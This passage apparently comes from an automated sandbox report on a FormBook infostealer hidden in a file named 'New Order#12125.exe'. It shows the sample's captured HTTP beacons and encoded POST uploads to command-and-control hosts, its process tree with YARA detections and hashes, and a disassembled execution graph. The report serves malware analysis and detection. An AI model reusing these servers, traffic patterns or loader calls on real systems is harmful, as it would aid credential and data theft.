                                                                      Data Ascii: 60q4=VRKAxCXV7CRWJS0BCEWXUPYeU3uT9mkXSfdJiozmwtQoWaw6sJnfvsrwTBhlARxC+Ke4dCC2/zCuIDZjz/hGGFI9qwd+r1i2WpfoxwPOw8/DeXj5X08vKVxnV1Wogiu69pDKg/DK4j+AW2h8OyXgrqZs93/EYHWNNs+25/XDePx6oaKo33OnKjEfNOa8SlAZTpQ3omt/CCj1A0Jd4pFvNS4zcEPL6fXOxlXDWomz7IxPmIu+zZYW7Dqfs/ss214Fr0xhZCDGLuZ6styqqwVC+fQm/q64cKGlQrSKAN6eYy0y7Z1xZILHW18BVXw7bW0OzHdKUaQVK154rzfxebM+9oJyqPTroKHuqkgZbbgJE5qdR6RV1xQUpFqoCSlYm9MHuUX9dliCUIrCIuiZT52ktNso3Ypq4MJ+RLOYrJPxd51AUbGwpOo6DWnVb/dc6CfQW/zER1F5IVtRM8UB1W2ZmH5jgZnHF+shb4rIffRB0D+c7q4zH1nWZ7R1DlsFgii667j0TEYwXhSAE5GzIR8RJQkWQzdnOWuxoJZ1Xq6sFo8Tqwd9vT6QwesjIISFErH/Pwf5eMQn7Sjc6fUpmFONjT2eO2+W734bxCXK5opEyHRH8pzO+1FTx+V/lNS7RYPyKngxcm1pPABMjXGF1wglRgwit6/7R7GVq7XkljDtreoNdxCNlcQUEv18XXXlXaFX4tij4LR6ld1zCc9Zgs6kBsgj7zxxpBG3bgUEt5pGJyCHpknVycWAKvhNnwsXFPfO2AutXkWdvxvg4JXU9VgYSF/eYiSEoQ2mPJuLvHy7/q9HTA/sZTyqI+Rxa/LQ8UQ7JbQRxV+Vkf8gWvYFJQReNNZC8BHEqNocaKguRQx5FxujuRNG/n1dLtBbRRs7iulgLjdlGVFWz6RvvyGjjRTR8m9e/OMgoqhlUcNSUORjEhcLjsMrSNpErDl9D417D452nXa3PSl3P3jeTN/PNojHJb2DwvD9DDjGA9YRh3wVUvY9fgg [TRUNCATED]
                                                                      Jan 13, 2025 15:14:51.283473969 CET370INHTTP/1.1 301 Moved Permanently
                                                                      Server: openresty
                                                                      Date: Mon, 13 Jan 2025 14:14:51 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 166
                                                                      Connection: close
                                                                      Location: https://www.sonixingenuine.shop/01c7/
                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      44192.168.2.84975313.228.81.39801484C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 15:14:52.888453007 CET489OUTGET /01c7/?XxGx=INH0eLoh&60q4=YTigy0/11EA1EDERDWqOfMNZXkK2gBVueN49sLqr1toXUas0k4bLkY/pThMrKnph3bjNfCydzgD9Nz90+/wReFoBqhl5n3/gZ7z43FPL8v6UGlzjHBkbB1lRKGmkyDfNsg== HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Host: www.sonixingenuine.shop
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Jan 13, 2025 15:14:53.830084085 CET522INHTTP/1.1 301 Moved Permanently
                                                                      Server: openresty
                                                                      Date: Mon, 13 Jan 2025 14:14:53 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 166
                                                                      Connection: close
                                                                      Location: https://www.sonixingenuine.shop/01c7/?XxGx=INH0eLoh&60q4=YTigy0/11EA1EDERDWqOfMNZXkK2gBVueN49sLqr1toXUas0k4bLkY/pThMrKnph3bjNfCydzgD9Nz90+/wReFoBqhl5n3/gZ7z43FPL8v6UGlzjHBkbB1lRKGmkyDfNsg==
                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      45192.168.2.849754154.39.239.237801484C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 15:15:00.843029022 CET731OUTPOST /b9e2/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.moyu19.pro
                                                                      Origin: http://www.moyu19.pro
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 205
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.moyu19.pro/b9e2/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Raw: 36 30 71 34 3d 48 56 69 47 6d 71 56 48 48 7a 54 7a 6c 39 7a 43 6d 64 68 6e 48 69 4c 4f 38 51 6b 68 43 71 38 4f 34 5a 49 4a 75 78 48 39 56 30 32 48 67 65 31 39 51 47 45 44 43 62 46 43 30 64 57 33 33 5a 50 49 6e 6e 74 39 65 65 42 43 34 42 35 75 5a 4f 79 53 78 39 46 70 57 75 41 4a 30 76 55 78 30 2b 79 43 79 31 52 2b 56 53 68 4a 59 44 67 77 70 33 73 34 71 38 4e 50 6a 6a 49 7a 30 4e 62 36 65 31 7a 2f 70 61 41 7a 57 7a 34 39 59 75 6d 34 73 37 72 71 32 44 5a 70 2f 72 41 63 44 55 63 50 41 42 63 42 7a 49 34 71 6f 36 2b 56 39 62 30 74 53 36 75 59 64 5a 62 48 6a 65 4d 39 54 4a 42 68 4e 6c 43 51 79 4a 57 4f 34 31 6b 3d
                                                                      Data Ascii: 60q4=HViGmqVHHzTzl9zCmdhnHiLO8QkhCq8O4ZIJuxH9V02Hge19QGEDCbFC0dW33ZPInnt9eeBC4B5uZOySx9FpWuAJ0vUx0+yCy1R+VShJYDgwp3s4q8NPjjIz0Nb6e1z/paAzWz49Yum4s7rq2DZp/rAcDUcPABcBzI4qo6+V9b0tS6uYdZbHjeM9TJBhNlCQyJWO41k=


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      46192.168.2.849755154.39.239.237801484C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 15:15:03.392767906 CET751OUTPOST /b9e2/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.moyu19.pro
                                                                      Origin: http://www.moyu19.pro
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 225
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.moyu19.pro/b9e2/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Raw: 36 30 71 34 3d 48 56 69 47 6d 71 56 48 48 7a 54 7a 6a 74 44 43 6b 2b 35 6e 46 43 4b 38 35 51 6b 68 5a 36 38 4b 34 5a 45 4a 75 30 6e 74 56 6d 43 48 67 2f 46 39 43 55 67 44 48 62 46 43 2f 39 57 79 34 35 4f 47 6e 6e 78 31 65 63 56 43 34 42 74 75 5a 4c 4f 53 77 4d 46 71 56 65 41 78 38 50 55 7a 36 65 79 43 79 31 52 2b 56 53 63 73 59 44 6f 77 70 47 63 34 37 75 31 4d 38 54 49 30 67 64 62 36 61 31 7a 6a 70 61 41 46 57 33 34 58 59 74 4f 34 73 37 37 71 33 53 5a 6d 32 72 41 61 65 6b 63 52 50 6a 39 4a 36 70 77 45 75 4d 69 4b 32 59 77 73 65 73 66 79 48 37 54 42 67 65 6b 57 54 4b 70 58 49 53 66 34 6f 71 47 2b 6d 69 7a 61 47 59 6a 32 35 59 45 44 49 55 4f 42 33 49 62 79 4f 77 2f 64
                                                                      Data Ascii: 60q4=HViGmqVHHzTzjtDCk+5nFCK85QkhZ68K4ZEJu0ntVmCHg/F9CUgDHbFC/9Wy45OGnnx1ecVC4BtuZLOSwMFqVeAx8PUz6eyCy1R+VScsYDowpGc47u1M8TI0gdb6a1zjpaAFW34XYtO4s77q3SZm2rAaekcRPj9J6pwEuMiK2YwsesfyH7TBgekWTKpXISf4oqG+mizaGYj25YEDIUOB3IbyOw/d


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      47192.168.2.849756154.39.239.237801484C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 15:15:05.942797899 CET1768OUTPOST /b9e2/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.moyu19.pro
                                                                      Origin: http://www.moyu19.pro
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 1241
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.moyu19.pro/b9e2/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Raw: 36 30 71 34 3d 48 56 69 47 6d 71 56 48 48 7a 54 7a 6a 74 44 43 6b 2b 35 6e 46 43 4b 38 35 51 6b 68 5a 36 38 4b 34 5a 45 4a 75 30 6e 74 56 6d 61 48 67 4e 4e 39 51 6b 63 44 41 62 46 43 6b 64 57 7a 34 35 50 61 6e 6e 35 50 65 63 5a 34 34 43 56 75 57 4a 32 53 68 49 52 71 43 4f 41 78 2b 50 55 79 30 2b 79 54 79 30 67 35 56 53 73 73 59 44 6f 77 70 46 30 34 37 38 4e 4d 36 54 49 7a 30 4e 61 75 65 31 7a 66 70 61 34 37 57 33 73 74 5a 64 75 34 73 61 4c 71 31 6b 4e 6d 75 37 41 59 64 6b 64 43 50 6a 78 47 36 70 38 79 75 4d 2b 73 32 59 49 73 63 63 53 4e 44 4a 76 4c 6a 50 45 71 58 4a 78 49 51 68 2f 76 31 36 65 72 6a 68 44 56 4e 4e 44 47 2f 72 74 4b 41 55 61 4d 68 4d 54 46 49 67 71 49 4b 69 62 67 76 49 43 50 4c 52 39 48 52 53 4e 5a 4e 44 53 4a 66 59 7a 44 33 57 73 78 63 6d 74 38 4a 51 35 49 2f 64 77 71 42 4f 4e 54 38 51 6a 65 67 78 72 48 44 39 62 56 65 64 66 69 58 52 36 77 38 67 69 47 6a 31 4a 68 2b 78 43 4c 6f 34 2b 69 57 35 63 4f 6f 45 68 6a 57 31 79 4f 6c 55 6d 41 68 4b 66 71 52 2f 41 61 69 6c 73 46 49 74 53 69 75 [TRUNCATED]
                                                                      Data Ascii: 60q4=HViGmqVHHzTzjtDCk+5nFCK85QkhZ68K4ZEJu0ntVmaHgNN9QkcDAbFCkdWz45Pann5PecZ44CVuWJ2ShIRqCOAx+PUy0+yTy0g5VSssYDowpF0478NM6TIz0Naue1zfpa47W3stZdu4saLq1kNmu7AYdkdCPjxG6p8yuM+s2YIsccSNDJvLjPEqXJxIQh/v16erjhDVNNDG/rtKAUaMhMTFIgqIKibgvICPLR9HRSNZNDSJfYzD3Wsxcmt8JQ5I/dwqBONT8QjegxrHD9bVedfiXR6w8giGj1Jh+xCLo4+iW5cOoEhjW1yOlUmAhKfqR/AailsFItSiudlHxPq/xCkyxt7q5aIu8EHYH1wvuJ22JWHT6zjRb/avEokaOYMkeEwLT7RXHoGrx3NN3gNxQgWCROD9ZGG5vDBEkMeau5kaLUOGDQHJMK+NgOCYt795i2OLHHVhFuhgQGBB22+YAmQheEM5CHQVh3qeJ3Po6XXI9fA7HnAUNnejDABkTnnBbovtHpEEmGr9Slk7V26cVPbN5GRmKtzO8sm+TIhuG64ye0QEsxS3aiJVtbG5s/hqEKabMY2BvjW9JaiduRhu20InosGpJIrOc/YqAA+HTGxGol8m7FS3jDqZFZPZwPhrok4eJKhC3P2YQPo7wfgLMN+fhPCUmeSZYTH0H7ywsCkJhmLbcVJa8cNaCbuU1ZJTwduJFAMRdXd/h92hp8TKFVNJ1herzkzbhjwTYKBWPET8GjP3t9RM5oZAFGCTlKQow4YzkEQ+JKyno/H9AY9hsvFIGX8+k4ZXKsEbVWmRwmxW1ORT8W1osiOGhxfPPJp7hpPeKbG3t4gyAFTE1pt4LCfrL3rOBENFqIUsx+7v96hy0ZAeT9uu1ey9nLTDhd6zXP36Ks/pZ4dzd4Ekq5CXUH5DuvVyvvkKgEvJVVVmpWRQCqXmWA0tY/CvWMx+0QGUVhWFdrsEp+2PC06EDAnItGx7qgNkEP4h9VRKVQO+3DCP8w4 [TRUNCATED]


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      48192.168.2.849757154.39.239.237801484C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 15:15:08.480974913 CET480OUTGET /b9e2/?60q4=KXKmlftrGUnNwN7yhNFRHhuh5Rs4DPRuyIFWo1edE1ybkp1zCkMUBe9/9dTIwO/9znAhfptP/ghbc5af4f99NOYW1ed+75fZ9khrC38pBidS91YBqsB3/Rw22POvSz2t7Q==&XxGx=INH0eLoh HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Host: www.moyu19.pro
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1


                                                                      Statistics

                                                                      CPU Usage

                                                                      Click to jump to process

                                                                      Memory Usage

                                                                      Click to jump to process

                                                                      Behavior

                                                                      Click to jump to process

                                                                      System Behavior

                                                                      General

                                                                      Target ID:0
                                                                      Start time:09:11:09
                                                                      Start date:13/01/2025
                                                                      Path:C:\Users\user\Desktop\New Order#12125.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Desktop\New Order#12125.exe"
                                                                      Imagebase:0x290000
                                                                      File size:333'824 bytes
                                                                      MD5 hash:2A0DFBFC319B0082F4FCDC47317E7F23
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1802187865.0000000001470000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1801757859.0000000000291000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1805331540.00000000022F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:3
                                                                      Start time:09:11:41
                                                                      Start date:13/01/2025
                                                                      Path:C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe"
                                                                      Imagebase:0x10000
                                                                      File size:140'800 bytes
                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3862461350.0000000003C00000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      General

                                                                      Target ID:4
                                                                      Start time:09:11:43
                                                                      Start date:13/01/2025
                                                                      Path:C:\Windows\SysWOW64\fc.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\SysWOW64\fc.exe"
                                                                      Imagebase:0x6a0000
                                                                      File size:22'528 bytes
                                                                      MD5 hash:4D5F86B337D0D099E18B14F1428AAEFF
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3862175429.0000000003340000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3862316494.0000000003390000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3849108726.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:moderate
                                                                      Has exited:false

                                                                      General

                                                                      Target ID:7
                                                                      Start time:09:11:56
                                                                      Start date:13/01/2025
                                                                      Path:C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe"
                                                                      Imagebase:0x10000
                                                                      File size:140'800 bytes
                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      General

                                                                      Target ID:9
                                                                      Start time:09:12:09
                                                                      Start date:13/01/2025
                                                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                      Imagebase:0x7ff6d20e0000
                                                                      File size:676'768 bytes
                                                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Disassembly

                                                                      Reset < >

                                                                        Execution Graph

                                                                        Execution Coverage:1.1%
                                                                        Dynamic/Decrypted Code Coverage:5.3%
                                                                        Signature Coverage:8.3%
                                                                        Total number of Nodes:133
                                                                        Total number of Limit Nodes:7
                                                                        execution_graph 94878 2a9258 94879 2bcb43 NtClose 94878->94879 94880 2a9262 94879->94880 94881 1542b60 LdrInitializeThunk 94811 2a402f 94812 2a3fa6 94811->94812 94812->94811 94813 2a3fb5 94812->94813 94815 2bcdd3 94812->94815 94816 2bcdf0 94815->94816 94819 1542c70 LdrInitializeThunk 94816->94819 94817 2bce18 94817->94813 94819->94817 94820 2bfd03 94823 2bec03 94820->94823 94826 2bceb3 94823->94826 94825 2bec1c 94827 2bcecd 94826->94827 94828 2bcede RtlFreeHeap 94827->94828 94828->94825 94829 2bc143 94830 2bc15d 94829->94830 94833 1542df0 LdrInitializeThunk 94830->94833 94831 2bc185 94833->94831 94834 2bfca3 94835 2bfcb9 94834->94835 94836 2bfcb3 94834->94836 94839 2bece3 94835->94839 94838 2bfcdf 94842 2bce63 94839->94842 94841 2becfe 94841->94838 94843 2bce80 94842->94843 94844 2bce91 RtlAllocateHeap 94843->94844 94844->94841 94845 2b51a3 94850 2b51bc 94845->94850 94846 2b524c 94847 2b5204 94848 2bec03 RtlFreeHeap 94847->94848 94849 2b5214 94848->94849 94850->94846 94850->94847 94851 2b5247 94850->94851 94852 2bec03 RtlFreeHeap 94851->94852 94852->94846 94882 2b4e13 94883 2b4e2f 94882->94883 94884 2b4e6b 94883->94884 94885 2b4e57 94883->94885 94886 2bcb43 NtClose 94884->94886 94887 2bcb43 NtClose 94885->94887 94889 2b4e74 94886->94889 94888 2b4e60 94887->94888 94892 2bed23 RtlAllocateHeap 94889->94892 94891 2b4e7f 94892->94891 94853 2aaa63 94854 2aaa7b 94853->94854 94856 2aaad5 94853->94856 94854->94856 94857 2ae993 94854->94857 94858 2ae9b9 94857->94858 94861 2aeab0 94858->94861 94863 2bfd43 RtlAllocateHeap RtlFreeHeap 94858->94863 94860 2aea4e 94860->94861 94864 2bc193 94860->94864 94861->94856 94863->94860 94865 2bc1b0 94864->94865 94868 1542c0a 94865->94868 94866 2bc1dc 94866->94861 94869 1542c11 94868->94869 94870 1542c1f LdrInitializeThunk 94868->94870 94869->94866 94870->94866 94871 2ab7c3 94872 2ab807 94871->94872 94873 2ab828 94872->94873 94875 2bcb43 94872->94875 94876 2bcb60 94875->94876 94877 2bcb71 NtClose 94876->94877 94877->94873 94893 2a44f3 94894 2a450d 94893->94894 94899 2a7ca3 94894->94899 94896 2a452b 94897 2a455f PostThreadMessageW 94896->94897 94898 2a4570 94896->94898 94897->94898 94900 2a7cc7 94899->94900 94901 2a7cce 94900->94901 94902 2a7d03 LdrLoadDll 94900->94902 94901->94896 94902->94901 94903 2c0173 94906 2be7b3 94903->94906 94907 2be7d9 94906->94907 94918 297583 94907->94918 94909 2be7ef 94917 2be84b 94909->94917 94921 2ab5d3 94909->94921 94911 2be80e 94914 2be823 94911->94914 94936 2bcf03 94911->94936 94932 2b86d3 94914->94932 94915 2be83d 94916 2bcf03 ExitProcess 94915->94916 94916->94917 94939 2a6953 94918->94939 94920 297590 94920->94909 94922 2ab5ff 94921->94922 94950 2ab4c3 94922->94950 94925 2ab62c 94927 2bcb43 NtClose 94925->94927 94928 2ab637 94925->94928 94926 2ab644 94929 2bcb43 NtClose 94926->94929 94930 2ab660 94926->94930 94927->94928 94928->94911 94931 2ab656 94929->94931 94930->94911 94931->94911 94933 2b8735 94932->94933 94935 2b8742 94933->94935 94961 2a8b13 94933->94961 94935->94915 94937 2bcf1d 94936->94937 94938 2bcf2a ExitProcess 94937->94938 94938->94914 94940 2a6970 94939->94940 94942 2a6989 94940->94942 94943 2bd583 94940->94943 94942->94920 94945 2bd59d 94943->94945 94944 2bd5cc 94944->94942 94945->94944 94946 2bc193 LdrInitializeThunk 94945->94946 94947 2bd62c 94946->94947 94948 2bec03 RtlFreeHeap 94947->94948 94949 2bd645 94948->94949 94949->94942 94951 2ab5b9 94950->94951 94952 2ab4dd 94950->94952 94951->94925 94951->94926 94956 2bc233 94952->94956 94955 2bcb43 NtClose 94955->94951 94957 2bc250 94956->94957 94960 15435c0 LdrInitializeThunk 94957->94960 94958 2ab5ad 94958->94955 94960->94958 94962 2a8b3d 94961->94962 94968 2a903b 94962->94968 94969 2a4173 94962->94969 94964 2a8c6a 94965 2bec03 RtlFreeHeap 94964->94965 94964->94968 94966 2a8c82 94965->94966 94967 2bcf03 ExitProcess 94966->94967 94966->94968 94967->94968 94968->94935 94973 2a4193 94969->94973 94971 2a41fc 94971->94964 94972 2a41f2 94972->94964 94973->94971 94974 2ab8e3 RtlFreeHeap LdrInitializeThunk 94973->94974 94974->94972

                                                                        Executed Functions

                                                                        Function 002A8B13 Relevance: 2.9, Strings: 2, Instructions: 433COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 46 2a8b13-2a8b4a call 2beca3 49 2a8b55-2a8b87 call 2beca3 call 294b43 call 2b47b3 46->49 50 2a8b50 call 2beca3 46->50 57 2a8b8d-2a8bb7 call 2bec53 49->57 58 2a9046-2a904a 49->58 50->49 61 2a8bb9-2a8bc0 57->61 62 2a8bc2 57->62 63 2a8bc4-2a8bce 61->63 62->63 64 2a8bef-2a8c01 call 2b47e3 63->64 65 2a8bd0 63->65 72 2a8c07-2a8c1f call 2be603 64->72 73 2a9044-2a9045 64->73 66 2a8bd3-2a8bd6 65->66 68 2a8bd8-2a8bdb 66->68 69 2a8bdf-2a8be9 66->69 68->66 71 2a8bdd 68->71 69->64 71->64 72->73 76 2a8c25-2a8c75 call 2a4173 72->76 73->58 76->73 79 2a8c7b-2a8c9b call 2bec03 76->79 82 2a8ccc-2a8cce 79->82 83 2a8c9d-2a8c9f 79->83 84 2a8cd0 82->84 85 2a8cd7-2a8cf9 call 2ab673 82->85 83->85 86 2a8ca1-2a8caf call 2be173 call 2970c3 83->86 84->85 85->73 91 2a8cff-2a8d21 call 2bc363 85->91 94 2a8cb4-2a8cb9 86->94 95 2a8d26-2a8d2b 91->95 94->82 96 2a8cbb-2a8cca 94->96 95->73 97 2a8d31-2a8da7 call 2bbd03 call 2bbdb3 call 2bec53 95->97 96->97 104 2a8da9-2a8dae 97->104 105 2a8db0 97->105 106 2a8db2-2a8de2 104->106 105->106 107 2a8de8-2a8dee 106->107 108 2a8ebe 106->108 109 2a8dfc-2a8e1d call 2bec53 107->109 110 2a8df0-2a8df3 107->110 111 2a8ec0 108->111 118 2a8e29 109->118 119 2a8e1f-2a8e27 109->119 110->107 113 2a8df5-2a8df7 110->113 114 2a8ec7-2a8ecb 111->114 113->111 116 2a8ecd-2a8ecf 114->116 117 2a8ed1-2a8ed5 114->117 116->117 120 2a8ed7-2a8eeb 116->120 117->114 121 2a8e2c-2a8e41 118->121 119->121 122 2a8eed-2a8ef2 120->122 123 2a8f55-2a8fa8 call 2a7c23 * 2 call 2bec23 120->123 124 2a8e43 121->124 125 2a8e54-2a8e95 call 2a7ba3 call 2bec53 121->125 127 2a8ef4-2a8ef7 122->127 153 2a8faa-2a8fae 123->153 154 2a8fcd-2a8fd2 123->154 128 2a8e46-2a8e49 124->128 148 2a8e9e 125->148 149 2a8e97-2a8e9c 125->149 130 2a8ef9-2a8efc 127->130 131 2a8f0e-2a8f10 127->131 135 2a8e4b-2a8e4e 128->135 136 2a8e52 128->136 130->131 138 2a8efe-2a8f00 130->138 131->127 134 2a8f12-2a8f14 131->134 134->123 140 2a8f16-2a8f1e 134->140 135->128 141 2a8e50 135->141 136->125 138->131 143 2a8f02-2a8f05 138->143 145 2a8f23-2a8f26 140->145 141->125 143->131 147 2a8f07 143->147 150 2a8f28-2a8f2b 145->150 151 2a8f4f-2a8f53 145->151 147->131 155 2a8ea0-2a8ebc call 2a50a3 148->155 149->155 150->151 156 2a8f2d-2a8f2f 150->156 151->123 151->145 157 2a8fda-2a8fec call 2bbf13 153->157 158 2a8fb0-2a8fc1 call 297133 153->158 154->157 159 2a8fd4 154->159 155->111 156->151 161 2a8f31-2a8f34 156->161 168 2a8ff3-2a9008 call 2ab843 157->168 166 2a8fc6-2a8fcb 158->166 159->157 161->151 165 2a8f36-2a8f4c 161->165 165->151 166->154 166->168 171 2a900a-2a9036 call 2a7ba3 * 